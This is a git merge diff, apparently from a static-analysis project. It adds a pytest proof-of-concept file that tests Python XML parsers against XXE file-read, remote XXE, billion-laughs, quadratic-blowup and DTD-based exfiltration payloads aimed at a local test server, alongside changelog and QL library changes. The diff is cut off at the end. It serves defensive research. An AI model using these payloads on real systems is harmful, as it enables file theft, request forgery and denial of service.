Merge branch 'main' into py/CsvInjection

This commit is contained in:
yoff
2022-05-25 10:43:08 +02:00
committed by GitHub
6918 changed files with 534741 additions and 123456 deletions

1
python/PoCs/README.md Normal file
View File

@@ -0,0 +1 @@
A place to collect proof of concept for how certain vulnerabilities work.

View File

@@ -0,0 +1,714 @@
#!/usr/bin/env python3
# this file doesn't have a .py extension so the extractor doesn't pick it up, so it
# doesn't have to be annotated
# This file shows the ways to make exploit vulnerable XML parsing
# see
# https://pypi.org/project/defusedxml/#python-xml-libraries
# https://docs.python.org/3.10/library/xml.html#xml-vulnerabilities
import pathlib
from flask import Flask
import threading
import multiprocessing
import time
from io import StringIO
import pytest
HOST = "localhost"
PORT = 8080
FLAG_PATH = pathlib.Path(__file__).with_name("flag")
# ==============================================================================
# xml samples
ok_xml = f"""<?xml version="1.0"?>
<test>hello world</test>
"""
local_xxe = f"""<?xml version="1.0"?>
<!DOCTYPE dt [
<!ENTITY xxe SYSTEM "file://{FLAG_PATH}">
]>
<test>&xxe;</test>
"""
remote_xxe = f"""<?xml version="1.0"?>
<!DOCTYPE dt [
<!ENTITY remote_xxe SYSTEM "http://{HOST}:{PORT}/xxe">
]>
<test>&remote_xxe;</test>
"""
billion_laughs = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>"""
quadratic_blowup = f"""<?xml version="1.0"?>
<!DOCTYPE wolo [
<!ENTITY oops "{"a" * 100000}">
]>
<foo>{"&oops;"*20000}</foo>"""
dtd_retrieval = f"""<?xml version="1.0"?>
<!DOCTYPE dt PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://{HOST}:{PORT}/test.dtd">
<foo>bar</foo>
"""
exfiltrate_through_dtd_retrieval = f"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://{HOST}:{PORT}/exfiltrate-through.dtd"> %xxe; ]>
"""
predefined_entity_xml = """<?xml version="1.0"?>
<test>&lt;</test>
"""
# ==============================================================================
# other setup
# we set up local Flask application so we can tests whether loading external resources
# works (such as SSRF from DTD-retrival works)
app = Flask(__name__)
@app.route("/alive")
def alive():
return "ok"
hit_dtd = False
@app.route("/test.dtd")
def test_dtd():
global hit_dtd
hit_dtd = True
return """<?xml version="1.0" encoding="UTF-8"?>"""
hit_xxe = False
@app.route("/xxe")
def test_xxe():
global hit_xxe
hit_xxe = True
return "ok"
@app.route("/exfiltrate-through.dtd")
def exfiltrate_through_dtd():
return f"""<!ENTITY % file SYSTEM "file://{FLAG_PATH}">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://{HOST}:{PORT}/exfiltrate-data?data=%file;'>">
%eval;
%exfiltrate;
"""
exfiltrated_data = None
@app.route("/exfiltrate-data")
def exfiltrate_data():
from flask import request
global exfiltrated_data
exfiltrated_data = request.args["data"]
return "ok"
def run_app():
app.run(host=HOST, port=PORT)
@pytest.fixture(scope="session", autouse=True)
def flask_app_running():
# run flask in other thread
flask_thread = threading.Thread(target=run_app, daemon=True)
flask_thread.start()
# give flask a bit of time to start
time.sleep(0.1)
# ensure that the server works
import requests
requests.get(f"http://{HOST}:{PORT}/alive")
yield
def expects_timeout(func):
def inner():
proc = multiprocessing.Process(target=func)
proc.start()
time.sleep(0.1)
assert proc.exitcode == None
proc.kill()
proc.join()
return inner
class TestExpectsTimeout:
"test that expects_timeout works as expected"
@staticmethod
@expects_timeout
def test_slow():
time.sleep(1000)
@staticmethod
def test_fast():
@expects_timeout
def fast_func():
return "done!"
with pytest.raises(AssertionError):
fast_func()
# ==============================================================================
import xml.sax
import xml.sax.handler
class SimpleHandler(xml.sax.ContentHandler):
def __init__(self):
self.result = []
def characters(self, data):
self.result.append(data)
class TestSax():
# always vuln to billion laughs, quadratic
@staticmethod
@expects_timeout
def test_billion_laughs_allowed_by_default():
parser = xml.sax.make_parser()
parser.parse(StringIO(billion_laughs))
@staticmethod
@expects_timeout
def test_quardratic_blowup_allowed_by_default():
parser = xml.sax.make_parser()
parser.parse(StringIO(quadratic_blowup))
@staticmethod
def test_ok_xml():
handler = SimpleHandler()
parser = xml.sax.make_parser()
parser.setContentHandler(handler)
parser.parse(StringIO(ok_xml))
assert handler.result == ["hello world"], handler.result
@staticmethod
def test_xxe_disabled_by_default():
handler = SimpleHandler()
parser = xml.sax.make_parser()
parser.setContentHandler(handler)
parser.parse(StringIO(local_xxe))
assert handler.result == [], handler.result
@staticmethod
def test_local_xxe_manually_enabled():
handler = SimpleHandler()
parser = xml.sax.make_parser()
parser.setContentHandler(handler)
parser.setFeature(xml.sax.handler.feature_external_ges, True)
parser.parse(StringIO(local_xxe))
assert handler.result[0] == "SECRET_FLAG", handler.result
@staticmethod
def test_remote_xxe_manually_enabled():
global hit_xxe
hit_xxe = False
handler = SimpleHandler()
parser = xml.sax.make_parser()
parser.setContentHandler(handler)
parser.setFeature(xml.sax.handler.feature_external_ges, True)
parser.parse(StringIO(remote_xxe))
assert handler.result == ["ok"], handler.result
assert hit_xxe == True
@staticmethod
def test_dtd_disabled_by_default():
global hit_dtd
hit_dtd = False
parser = xml.sax.make_parser()
parser.parse(StringIO(dtd_retrieval))
assert hit_dtd == False
@staticmethod
def test_dtd_manually_enabled():
global hit_dtd
hit_dtd = False
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
parser.parse(StringIO(dtd_retrieval))
assert hit_dtd == True
# ==============================================================================
import xml.etree.ElementTree
class TestEtree:
# always vuln to billion laughs, quadratic
@staticmethod
@expects_timeout
def test_billion_laughs_allowed_by_default():
parser = xml.etree.ElementTree.XMLParser()
_root = xml.etree.ElementTree.fromstring(billion_laughs, parser=parser)
@staticmethod
@expects_timeout
def test_quardratic_blowup_allowed_by_default():
parser = xml.etree.ElementTree.XMLParser()
_root = xml.etree.ElementTree.fromstring(quadratic_blowup, parser=parser)
@staticmethod
def test_ok_xml():
parser = xml.etree.ElementTree.XMLParser()
root = xml.etree.ElementTree.fromstring(ok_xml, parser=parser)
assert root.tag == "test"
assert root.text == "hello world"
@staticmethod
def test_ok_xml_sax_parser():
# you _can_ pass a SAX parser to xml.etree... but it doesn't give you the output :|
parser = xml.sax.make_parser()
root = xml.etree.ElementTree.fromstring(ok_xml, parser=parser)
assert root == None
@staticmethod
def test_ok_xml_lxml_parser():
# this is technically possible, since parsers follow the same API, and the
# `fromstring` function is just a thin wrapper... seems very unlikely that
# anyone would do this though :|
parser = lxml.etree.XMLParser()
root = xml.etree.ElementTree.fromstring(ok_xml, parser=parser)
assert root.tag == "test"
assert root.text == "hello world"
@staticmethod
def test_xxe_not_possible():
parser = xml.etree.ElementTree.XMLParser()
try:
_root = xml.etree.ElementTree.fromstring(local_xxe, parser=parser)
assert False
except xml.etree.ElementTree.ParseError as e:
assert "undefined entity &xxe" in str(e)
@staticmethod
def test_dtd_not_possible():
global hit_dtd
hit_dtd = False
parser = xml.etree.ElementTree.XMLParser()
_root = xml.etree.ElementTree.fromstring(dtd_retrieval, parser=parser)
assert hit_dtd == False
# ==============================================================================
import lxml.etree
class TestLxml:
# see https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.XMLParser
@staticmethod
def test_billion_laughs_disabled_by_default():
parser = lxml.etree.XMLParser()
try:
_root = lxml.etree.fromstring(billion_laughs, parser=parser)
assert False
except lxml.etree.XMLSyntaxError as e:
assert "Detected an entity reference loop" in str(e)
@staticmethod
def test_quardratic_blowup_disabled_by_default():
parser = lxml.etree.XMLParser()
try:
_root = lxml.etree.fromstring(quadratic_blowup, parser=parser)
assert False
except lxml.etree.XMLSyntaxError as e:
assert "Detected an entity reference loop" in str(e)
@staticmethod
@expects_timeout
def test_billion_laughs_manually_enabled():
parser = lxml.etree.XMLParser(huge_tree=True)
root = lxml.etree.fromstring(billion_laughs, parser=parser)
@staticmethod
@expects_timeout
def test_quadratic_blowup_manually_enabled():
parser = lxml.etree.XMLParser(huge_tree=True)
root = lxml.etree.fromstring(quadratic_blowup, parser=parser)
@staticmethod
def test_billion_laughs_huge_tree_not_enough():
parser = lxml.etree.XMLParser(huge_tree=True, resolve_entities=False)
root = lxml.etree.fromstring(billion_laughs, parser=parser)
assert root.tag == "lolz"
assert root.text == None
@staticmethod
def test_quadratic_blowup_huge_tree_not_enough():
parser = lxml.etree.XMLParser(huge_tree=True, resolve_entities=False)
root = lxml.etree.fromstring(quadratic_blowup, parser=parser)
assert root.tag == "foo"
assert root.text == None
@staticmethod
def test_ok_xml():
parser = lxml.etree.XMLParser()
root = lxml.etree.fromstring(ok_xml, parser=parser)
assert root.tag == "test"
assert root.text == "hello world"
@staticmethod
def test_local_xxe_enabled_by_default():
parser = lxml.etree.XMLParser()
root = lxml.etree.fromstring(local_xxe, parser=parser)
assert root.tag == "test"
assert root.text == "SECRET_FLAG", root.text
@staticmethod
def test_local_xxe_disabled():
parser = lxml.etree.XMLParser(resolve_entities=False)
root = lxml.etree.fromstring(local_xxe, parser=parser)
assert root.tag == "test"
assert root.text == None
@staticmethod
def test_remote_xxe_disabled_by_default():
global hit_xxe
hit_xxe = False
parser = lxml.etree.XMLParser()
root = lxml.etree.fromstring(remote_xxe, parser=parser)
assert hit_xxe == False
@staticmethod
def test_remote_xxe_manually_enabled():
global hit_xxe
hit_xxe = False
parser = lxml.etree.XMLParser(no_network=False)
root = lxml.etree.fromstring(remote_xxe, parser=parser)
assert root.tag == "test"
assert root.text == "ok"
assert hit_xxe == True
@staticmethod
def test_dtd_disabled_by_default():
global hit_dtd
hit_dtd = False
parser = lxml.etree.XMLParser()
root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
assert hit_dtd == False
@staticmethod
def test_dtd_manually_enabled():
global hit_dtd
hit_dtd = False
# Need to set BOTH load_dtd and no_network
parser = lxml.etree.XMLParser(load_dtd=True)
root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
assert hit_dtd == False
parser = lxml.etree.XMLParser(no_network=False)
root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
assert hit_dtd == False
parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
assert hit_dtd == True
hit_dtd = False
# Setting dtd_validation also does not allow the remote access
parser = lxml.etree.XMLParser(dtd_validation=True, load_dtd=True)
try:
root = lxml.etree.fromstring(dtd_retrieval, parser=parser)
except lxml.etree.XMLSyntaxError:
pass
assert hit_dtd == False
@staticmethod
def test_exfiltrate_through_dtd():
# note that this only works when the data to exfiltrate does not contain a newline :|
global exfiltrated_data
exfiltrated_data = None
parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
with pytest.raises(lxml.etree.XMLSyntaxError):
lxml.etree.fromstring(exfiltrate_through_dtd_retrieval, parser=parser)
assert exfiltrated_data == "SECRET_FLAG"
@staticmethod
def test_predefined_entity():
parser = lxml.etree.XMLParser(resolve_entities=False)
root = lxml.etree.fromstring(predefined_entity_xml, parser=parser)
assert root.tag == "test"
assert root.text == "<"
# ==============================================================================
import xmltodict
class TestXmltodict:
@staticmethod
def test_billion_laughs_disabled_by_default():
d = xmltodict.parse(billion_laughs)
assert d == {"lolz": None}, d
@staticmethod
def test_quardratic_blowup_disabled_by_default():
d = xmltodict.parse(quadratic_blowup)
assert d == {"foo": None}, d
@staticmethod
@expects_timeout
def test_billion_laughs_manually_enabled():
xmltodict.parse(billion_laughs, disable_entities=False)
@staticmethod
@expects_timeout
def test_quardratic_blowup_manually_enabled():
xmltodict.parse(quadratic_blowup, disable_entities=False)
@staticmethod
def test_ok_xml():
d = xmltodict.parse(ok_xml)
assert d == {"test": "hello world"}, d
@staticmethod
def test_local_xxe_not_possible():
d = xmltodict.parse(local_xxe)
assert d == {"test": None}
d = xmltodict.parse(local_xxe, disable_entities=False)
assert d == {"test": None}
@staticmethod
def test_remote_xxe_not_possible():
global hit_xxe
hit_xxe = False
d = xmltodict.parse(remote_xxe)
assert d == {"test": None}
assert hit_xxe == False
d = xmltodict.parse(remote_xxe, disable_entities=False)
assert d == {"test": None}
assert hit_xxe == False
@staticmethod
def test_dtd_not_possible():
global hit_dtd
hit_dtd = False
d = xmltodict.parse(dtd_retrieval)
assert hit_dtd == False
# ==============================================================================
import xml.dom.minidom
class TestMinidom:
@staticmethod
@expects_timeout
def test_billion_laughs():
xml.dom.minidom.parseString(billion_laughs)
@staticmethod
@expects_timeout
def test_quardratic_blowup():
xml.dom.minidom.parseString(quadratic_blowup)
@staticmethod
def test_ok_xml():
doc = xml.dom.minidom.parseString(ok_xml)
assert doc.documentElement.tagName == "test"
assert doc.documentElement.childNodes[0].data == "hello world"
@staticmethod
def test_xxe():
# disabled by default
doc = xml.dom.minidom.parseString(local_xxe)
assert doc.documentElement.tagName == "test"
assert doc.documentElement.childNodes == []
# but can be turned on
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
doc = xml.dom.minidom.parseString(local_xxe, parser=parser)
assert doc.documentElement.tagName == "test"
assert doc.documentElement.childNodes[0].data == "SECRET_FLAG"
# which also works remotely
global hit_xxe
hit_xxe = False
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
_doc = xml.dom.minidom.parseString(remote_xxe, parser=parser)
assert hit_xxe == True
@staticmethod
def test_dtd():
# not possible by default
global hit_dtd
hit_dtd = False
_doc = xml.dom.minidom.parseString(dtd_retrieval)
assert hit_dtd == False
# but can be turned on
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
_doc = xml.dom.minidom.parseString(dtd_retrieval, parser=parser)
assert hit_dtd == True
# ==============================================================================
import xml.dom.pulldom
class TestPulldom:
@staticmethod
@expects_timeout
def test_billion_laughs():
doc = xml.dom.pulldom.parseString(billion_laughs)
# you NEED to iterate over the items for it to take long
for event, node in doc:
pass
@staticmethod
@expects_timeout
def test_quardratic_blowup():
doc = xml.dom.pulldom.parseString(quadratic_blowup)
for event, node in doc:
pass
@staticmethod
def test_ok_xml():
doc = xml.dom.pulldom.parseString(ok_xml)
for event, node in doc:
if event == xml.dom.pulldom.START_ELEMENT:
assert node.tagName == "test"
elif event == xml.dom.pulldom.CHARACTERS:
assert node.data == "hello world"
@staticmethod
def test_xxe():
# disabled by default
doc = xml.dom.pulldom.parseString(local_xxe)
found_flag = False
for event, node in doc:
if event == xml.dom.pulldom.START_ELEMENT:
assert node.tagName == "test"
elif event == xml.dom.pulldom.CHARACTERS:
if node.data == "SECRET_FLAG":
found_flag = True
assert found_flag == False
# but can be turned on
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
doc = xml.dom.pulldom.parseString(local_xxe, parser=parser)
found_flag = False
for event, node in doc:
if event == xml.dom.pulldom.START_ELEMENT:
assert node.tagName == "test"
elif event == xml.dom.pulldom.CHARACTERS:
if node.data == "SECRET_FLAG":
found_flag = True
assert found_flag == True
# which also works remotely
global hit_xxe
hit_xxe = False
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
doc = xml.dom.pulldom.parseString(remote_xxe, parser=parser)
assert hit_xxe == False
for event, node in doc:
pass
assert hit_xxe == True
@staticmethod
def test_dtd():
# not possible by default
global hit_dtd
hit_dtd = False
doc = xml.dom.pulldom.parseString(dtd_retrieval)
for event, node in doc:
pass
assert hit_dtd == False
# but can be turned on
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_external_ges, True)
doc = xml.dom.pulldom.parseString(dtd_retrieval, parser=parser)
for event, node in doc:
pass
assert hit_dtd == True
# ==============================================================================
import xml.parsers.expat
class TestExpat:
# this is the underlying parser implementation used by the rest of the Python
# standard library. But people are probably not using this directly.
@staticmethod
@expects_timeout
def test_billion_laughs():
parser = xml.parsers.expat.ParserCreate()
parser.Parse(billion_laughs, True)
@staticmethod
@expects_timeout
def test_quardratic_blowup():
parser = xml.parsers.expat.ParserCreate()
parser.Parse(quadratic_blowup, True)
@staticmethod
def test_ok_xml():
char_data_recv = []
def char_data_handler(data):
char_data_recv.append(data)
parser = xml.parsers.expat.ParserCreate()
parser.CharacterDataHandler = char_data_handler
parser.Parse(ok_xml, True)
assert char_data_recv == ["hello world"]
@staticmethod
def test_xxe():
# not vuln by default
char_data_recv = []
def char_data_handler(data):
char_data_recv.append(data)
parser = xml.parsers.expat.ParserCreate()
parser.CharacterDataHandler = char_data_handler
parser.Parse(local_xxe, True)
assert char_data_recv == []
# there might be ways to make it vuln, but I did not investigate futher.
@staticmethod
def test_dtd():
# not vuln by default
global hit_dtd
hit_dtd = False
parser = xml.parsers.expat.ParserCreate()
parser.Parse(dtd_retrieval, True)
assert hit_dtd == False
# there might be ways to make it vuln, but I did not investigate futher.

View File

@@ -0,0 +1 @@
SECRET_FLAG

View File

@@ -1,3 +1,81 @@
## 0.3.0
### Breaking Changes
* The imports made available from `import python` are no longer exposed under `DataFlow::` after doing `import semmle.python.dataflow.new.DataFlow`, for example using `DataFlow::Add` will now cause a compile error.
### Minor Analysis Improvements
* The modeling of `request.files` in Flask has been fixed, so we now properly handle assignments to local variables (such as `files = request.files; files['key'].filename`).
* Added taint propagation for `io.StringIO` and `io.BytesIO`. This addition was originally [submitted as part of an experimental query by @jorgectf](https://github.com/github/codeql/pull/6112).
## 0.2.0
### Breaking Changes
* The signature of `allowImplicitRead` on `DataFlow::Configuration` and `TaintTracking::Configuration` has changed from `allowImplicitRead(DataFlow::Node node, DataFlow::Content c)` to `allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c)`.
## 0.1.0
### Breaking Changes
* The recently added flow-state versions of `isBarrierIn`, `isBarrierOut`, `isSanitizerIn`, and `isSanitizerOut` in the data flow and taint tracking libraries have been removed.
### Deprecated APIs
* Queries importing a data-flow configuration from `semmle.python.security.dataflow`
should ensure that the imported file ends with `Query`, and only import its top-level
module. For example, a query that used `CommandInjection::Configuration` from
`semmle.python.security.dataflow.CommandInjection` should from now use `Configuration`
from `semmle.python.security.dataflow.CommandInjectionQuery` instead.
### Major Analysis Improvements
* Added data-flow for Django ORM models that are saved in a database (no `models.ForeignKey` support).
### Minor Analysis Improvements
* Improved modeling of Flask `Response` objects, so passing a response body with the keyword argument `response` is now recognized.
## 0.0.13
## 0.0.12
### Breaking Changes
* The flow state variants of `isBarrier` and `isAdditionalFlowStep` are no longer exposed in the taint tracking library. The `isSanitizer` and `isAdditionalTaintStep` predicates should be used instead.
### Deprecated APIs
* Many classes/predicates/modules that had upper-case acronyms have been renamed to follow our style-guide.
The old name still exists as a deprecated alias.
* Some modules that started with a lowercase letter have been renamed to follow our style-guide.
The old name still exists as a deprecated alias.
### New Features
* The data flow and taint tracking libraries have been extended with versions of `isBarrierIn`, `isBarrierOut`, and `isBarrierGuard`, respectively `isSanitizerIn`, `isSanitizerOut`, and `isSanitizerGuard`, that support flow states.
### Minor Analysis Improvements
* All deprecated predicates/classes/modules that have been deprecated for over a year have been deleted.
## 0.0.11
### Minor Analysis Improvements
* Added new SSRF sinks for `httpx`, `pycurl`, `urllib`, `urllib2`, `urllib3`, and `libtaxii`. This improvement was [submitted by @haby0](https://github.com/github/codeql/pull/8275).
* The regular expression parser now groups sequences of normal characters. This reduces the number of instances of `RegExpNormalChar`.
* Fixed taint propagation for attribute assignment. In the assignment `x.foo = tainted` we no longer treat the entire object `x` as tainted, just because the attribute `foo` contains tainted data. This leads to slightly fewer false positives.
* Improved analysis of attributes for data-flow and taint tracking queries, so `getattr`/`setattr` are supported, and a write to an attribute properly stops flow for the old value in that attribute.
* Added post-update nodes (`DataFlow::PostUpdateNode`) for arguments in calls that can't be resolved.
## 0.0.10
### Deprecated APIs
* The old points-to based modeling has been deprecated. Use the new type-tracking/API-graphs based modeling instead.
## 0.0.9
## 0.0.8

View File

@@ -1,4 +0,0 @@
---
category: minorAnalysis
---
* Fixed taint propagation for attribute assignment. In the assignment `x.foo = tainted` we no longer treat the entire object `x` as tainted, just because the attribute `foo` contains tainted data. This leads to slightly fewer false positives.

View File

@@ -0,0 +1,4 @@
---
category: breaking
---
`API::moduleImport` no longer has any results for dotted names, such as `API::moduleImport("foo.bar")`. Using `API::moduleImport("foo.bar").getMember("baz").getACall()` previously worked if the Python code was `from foo.bar import baz; baz()`, but not if the code was `import foo.bar; foo.bar.baz()` -- we are making this change to ensure the approach that can handle all cases is always used.

View File

@@ -1,4 +1,5 @@
---
category: deprecated
---
## 0.0.10
### Deprecated APIs
* The old points-to based modeling has been deprecated. Use the new type-tracking/API-graphs based modeling instead.

View File

@@ -0,0 +1,9 @@
## 0.0.11
### Minor Analysis Improvements
* Added new SSRF sinks for `httpx`, `pycurl`, `urllib`, `urllib2`, `urllib3`, and `libtaxii`. This improvement was [submitted by @haby0](https://github.com/github/codeql/pull/8275).
* The regular expression parser now groups sequences of normal characters. This reduces the number of instances of `RegExpNormalChar`.
* Fixed taint propagation for attribute assignment. In the assignment `x.foo = tainted` we no longer treat the entire object `x` as tainted, just because the attribute `foo` contains tainted data. This leads to slightly fewer false positives.
* Improved analysis of attributes for data-flow and taint tracking queries, so `getattr`/`setattr` are supported, and a write to an attribute properly stops flow for the old value in that attribute.
* Added post-update nodes (`DataFlow::PostUpdateNode`) for arguments in calls that can't be resolved.

View File

@@ -0,0 +1,20 @@
## 0.0.12
### Breaking Changes
* The flow state variants of `isBarrier` and `isAdditionalFlowStep` are no longer exposed in the taint tracking library. The `isSanitizer` and `isAdditionalTaintStep` predicates should be used instead.
### Deprecated APIs
* Many classes/predicates/modules that had upper-case acronyms have been renamed to follow our style-guide.
The old name still exists as a deprecated alias.
* Some modules that started with a lowercase letter have been renamed to follow our style-guide.
The old name still exists as a deprecated alias.
### New Features
* The data flow and taint tracking libraries have been extended with versions of `isBarrierIn`, `isBarrierOut`, and `isBarrierGuard`, respectively `isSanitizerIn`, `isSanitizerOut`, and `isSanitizerGuard`, that support flow states.
### Minor Analysis Improvements
* All deprecated predicates/classes/modules that have been deprecated for over a year have been deleted.

View File

@@ -0,0 +1 @@
## 0.0.13

View File

@@ -0,0 +1,21 @@
## 0.1.0
### Breaking Changes
* The recently added flow-state versions of `isBarrierIn`, `isBarrierOut`, `isSanitizerIn`, and `isSanitizerOut` in the data flow and taint tracking libraries have been removed.
### Deprecated APIs
* Queries importing a data-flow configuration from `semmle.python.security.dataflow`
should ensure that the imported file ends with `Query`, and only import its top-level
module. For example, a query that used `CommandInjection::Configuration` from
`semmle.python.security.dataflow.CommandInjection` should from now use `Configuration`
from `semmle.python.security.dataflow.CommandInjectionQuery` instead.
### Major Analysis Improvements
* Added data-flow for Django ORM models that are saved in a database (no `models.ForeignKey` support).
### Minor Analysis Improvements
* Improved modeling of Flask `Response` objects, so passing a response body with the keyword argument `response` is now recognized.

View File

@@ -0,0 +1,5 @@
## 0.2.0
### Breaking Changes
* The signature of `allowImplicitRead` on `DataFlow::Configuration` and `TaintTracking::Configuration` has changed from `allowImplicitRead(DataFlow::Node node, DataFlow::Content c)` to `allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c)`.

View File

@@ -0,0 +1,10 @@
## 0.3.0
### Breaking Changes
* The imports made available from `import python` are no longer exposed under `DataFlow::` after doing `import semmle.python.dataflow.new.DataFlow`, for example using `DataFlow::Add` will now cause a compile error.
### Minor Analysis Improvements
* The modeling of `request.files` in Flask has been fixed, so we now properly handle assignments to local variables (such as `files = request.files; files['key'].filename`).
* Added taint propagation for `io.StringIO` and `io.BytesIO`. This addition was originally [submitted as part of an experimental query by @jorgectf](https://github.com/github/codeql/pull/6112).

View File

@@ -1,2 +1,2 @@
---
lastReleaseVersion: 0.0.9
lastReleaseVersion: 0.3.0

View File

@@ -1,5 +1,5 @@
name: codeql/python-all
version: 0.0.10-dev
version: 0.3.1-dev
groups: python
dbscheme: semmlecode.python.dbscheme
extractor: python

View File

@@ -6,8 +6,10 @@
* directed and labeled; they specify how the components represented by nodes relate to each other.
*/
private import python
// Importing python under the `py` namespace to avoid importing `CallNode` from `Flow.qll` and thereby having a naming conflict with `API::CallNode`.
private import python as PY
import semmle.python.dataflow.new.DataFlow
private import semmle.python.internal.CachedStages
/**
* Provides classes and predicates for working with APIs used in a database.
@@ -39,6 +41,30 @@ module API {
)
}
/**
* Gets a data-flow node corresponding to the right-hand side of a definition of the API
* component represented by this node.
*
* For example, in the property write `foo.bar = x`, variable `x` is the the right-hand side
* of a write to the `bar` property of `foo`.
*
* Note that for parameters, it is the arguments flowing into that parameter that count as
* right-hand sides of the definition, not the declaration of the parameter itself.
* Consequently, in :
* ```python
* from mypkg import foo;
* foo.bar(x)
* ```
* `x` is the right-hand side of a definition of the first parameter of `bar` from the `mypkg.foo` module.
*/
DataFlow::Node getARhs() { Impl::rhs(this, result) }
/**
* Gets a data-flow node that may interprocedurally flow to the right-hand side of a definition
* of the API component represented by this node.
*/
DataFlow::Node getAValueReachingRhs() { result = Impl::trackDefNode(this.getARhs()) }
/**
* Gets an immediate use of the API component represented by this node.
*
@@ -55,7 +81,7 @@ module API {
/**
* Gets a call to the function represented by this API component.
*/
DataFlow::CallCfgNode getACall() { result = this.getReturn().getAnImmediateUse() }
CallNode getACall() { result = this.getReturn().getAnImmediateUse() }
/**
* Gets a node representing member `m` of this API component.
@@ -92,6 +118,29 @@ module API {
*/
Node getReturn() { result = this.getASuccessor(Label::return()) }
/**
* Gets a node representing the `i`th parameter of the function represented by this node.
*
* This predicate may have multiple results when there are multiple invocations of this API component.
* Consider using `getAnInvocation()` if there is a need to distingiush between individual calls.
*/
Node getParameter(int i) { result = this.getASuccessor(Label::parameter(i)) }
/**
* Gets the node representing the keyword parameter `name` of the function represented by this node.
*
* This predicate may have multiple results when there are multiple invocations of this API component.
* Consider using `getAnInvocation()` if there is a need to distingiush between individual calls.
*/
Node getKeywordParameter(string name) {
result = this.getASuccessor(Label::keywordParameter(name))
}
/**
* Gets the number of parameters of the function represented by this node.
*/
int getNumParameter() { result = max(int s | exists(this.getParameter(s))) + 1 }
/**
* Gets a node representing a subclass of the class represented by this node.
*/
@@ -137,7 +186,7 @@ module API {
/**
* Gets the data-flow node that gives rise to this node, if any.
*/
DataFlow::Node getInducingNode() { this = Impl::MkUse(result) }
DataFlow::Node getInducingNode() { this = Impl::MkUse(result) or this = Impl::MkDef(result) }
/**
* Holds if this element is at the specified location.
@@ -210,6 +259,17 @@ module API {
}
}
/** A node corresponding to the rhs of an API component. */
class Def extends Node, Impl::TDef {
override string toString() {
exists(string type | this = Impl::MkDef(_) and type = "Def " |
result = type + this.getPath()
or
not exists(this.getPath()) and result = type + "with no path"
)
}
}
/** Gets the root node. */
Root root() { any() }
@@ -220,11 +280,73 @@ module API {
* you should use `.getMember` on the parent module. For example, for nodes corresponding to the module `foo.bar`,
* use `moduleImport("foo").getMember("bar")`.
*/
Node moduleImport(string m) { result = Impl::MkModuleImport(m) }
Node moduleImport(string m) {
result = Impl::MkModuleImport(m) and
// restrict `moduleImport` so it will never give results for a dotted name. Note
// that we cannot move this logic to the `MkModuleImport` construction, since we
// need the intermediate API graph nodes for the prefixes in `import foo.bar.baz`.
not m.matches("%.%")
}
/** Gets a node corresponding to the built-in with the given name, if any. */
Node builtin(string n) { result = moduleImport("builtins").getMember(n) }
/**
* An `CallCfgNode` that is connected to the API graph.
*
* Can be used to reason about calls to an external API in which the correlation between
* parameters and/or return values must be retained.
*
* The member predicates `getParameter`, `getKeywordParameter`, `getReturn`, and `getInstance` mimic
* the corresponding predicates from `API::Node`. These are guaranteed to exist and be unique to this call.
*/
class CallNode extends DataFlow::CallCfgNode {
API::Node callee;
CallNode() { this = callee.getReturn().getAnImmediateUse() }
/** Gets the API node for the `i`th parameter of this invocation. */
pragma[nomagic]
Node getParameter(int i) {
result = callee.getParameter(i) and
result = this.getAParameterCandidate(i)
}
/**
* Gets an API node where a RHS of the node is the `i`th argument to this call.
*/
pragma[noinline]
private Node getAParameterCandidate(int i) { result.getARhs() = this.getArg(i) }
/** Gets the API node for a parameter of this invocation. */
Node getAParameter() { result = this.getParameter(_) }
/** Gets the API node for the keyword parameter `name` of this invocation. */
Node getKeywordParameter(string name) {
result = callee.getKeywordParameter(name) and
result = this.getAKeywordParameterCandidate(name)
}
/** Gets the API node for the parameter that has index `i` or has keyword `name`. */
bindingset[i, name]
Node getParameter(int i, string name) {
result = this.getParameter(i)
or
result = this.getKeywordParameter(name)
}
pragma[noinline]
private Node getAKeywordParameterCandidate(string name) {
result.getARhs() = this.getArgByName(name)
}
/** Gets the API node for the return value of this call. */
Node getReturn() {
result = callee.getReturn() and
